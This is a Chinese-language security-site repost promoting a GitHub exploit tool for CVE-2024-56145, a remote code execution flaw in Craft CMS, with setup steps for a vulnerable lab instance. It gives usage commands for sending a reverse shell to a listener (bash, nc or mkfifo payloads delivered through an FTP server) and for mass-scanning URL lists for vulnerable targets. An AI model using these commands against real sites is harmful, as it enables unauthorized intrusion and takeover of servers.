CVE-2024-56145:Craft CMS 漏洞利用工具

admin 2024年12月22日18:40:30评论44 views字数 1854阅读6分10秒阅读模式
这款工具专门用于利用由 Assetnote 研究团队发现的 Craft CMS 漏洞。该漏洞源于系统对用户提供的模板路径处理不当,攻击者可通过精心构造的载荷实现远程代码执行(RCE)🛠️。

🙏 特别感谢 Assetnote 团队在安全领域的贡献与研究。

✨ 功能特点

  • 🚀 自动化 FTP 服务器用于投放恶意载荷
  • 🧪 反向 Shell 载荷生成器,支持多种方式(bashncmkfifo
  • 🔍 漏洞检测器用于识别易受攻击的目标
  • 🖥️ 多线程支持实现更快扫描
  • 🛠️ 简单易用的命令行界面,反馈清晰明了

🛡️ 搭建测试环境

按以下步骤搭建 Craft CMS 测试实例:

mkdir exploit-craft && 
cd exploit-craft && 
# 配置用于 Craft CMS 的 DDEV 项目
ddev config 
  --project-type=craftcms 
  --docroot=web 
  --create-docroot 
  --php-version="8.2" 
  --database="mysql:8.0" 
  --nodejs-version="20" && 
# 创建 DDEV 项目
ddev start -y && 
# 使用指定版本创建 Craft CMS
ddev composer create -y --no-scripts --no-interaction "craftcms/craft:5.0.0" && 
# 安装特定版本的 CMS
ddev composer require "craftcms/cms:5.5.0" 
  --no-scripts 
  --no-interaction --with-all-dependencies && 
# 设置 Craft CMS 安全密钥
ddev craft setup/security-key && 
# 安装 Craft CMS
ddev craft install/craft 
    --username=admin 
    --password=password123 
    [email protected] 
    --site-name=Testsite 
    --language=en 
    --site-url='$DDEV_PRIMARY_URL' && 
# 为 PHP 启用 register_argc_argv
mkdir -p .ddev/php/ && 
echo "register_argc_argv = On" > .ddev/php/php.ini && 
ddev restart && 
# 最后一步,输出提示信息并启动项目
echo '准备就绪!' && 
ddev launch

🚨 使用方法

使用 --help 参数查看可用命令:

python exploit.py --help
CVE-2024-56145:Craft CMS 漏洞利用工具

🚀 漏洞利用命令

攻击目标:

python exploit.py exploit -u <目标URL> -lh <本地主机> -lp <本地端口> -px <载荷类型>
CVE-2024-56145:Craft CMS 漏洞利用工具

⚙️ 参数说明:

  • -u / --url:目标网址(必填)
  • -lh / --lhost:用于接收反向 Shell 的本地 IP(必填)
  • -lp / --lport:监听器端口(必填)
  • -fh / --ftp-host:FTP 服务器主机
  • -fp / --ftp-port:FTP 服务器端口
  • -px / --payload:载荷类型(bashncmkfifo),默认:bash

🧪 示例:

python exploit.py exploit -u https://example.com -lh 192.168.1.10 -lp 4444 -fh 127.0.0.1 -fp 2121 -px bash

🔍 检查命令

检查目标是否存在漏洞:

python exploit.py check -u <目标URL> -f <URL列表文件> -t <线程数> -o <输出文件>

⚙️ 参数说明:

  • -u / --url:单个目标 URL
  • -f / --file:包含多个待扫描 URL 的文件
  • -t / --threads:扫描并发线程数
  • -o / --output:保存结果的输出文件
CVE-2024-56145:Craft CMS 漏洞利用工具

🧪 示例:

python exploit.py check -f urls.txt -t 10 -o results.txt

下载

https://github.com/Chocapikk/CVE-2024-56145

原文始发于微信公众号(独眼情报):CVE-2024-56145:Craft CMS 漏洞利用工具

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月22日18:40:30
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-56145:Craft CMS 漏洞利用工具https://cn-sec.com/archives/3539578.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息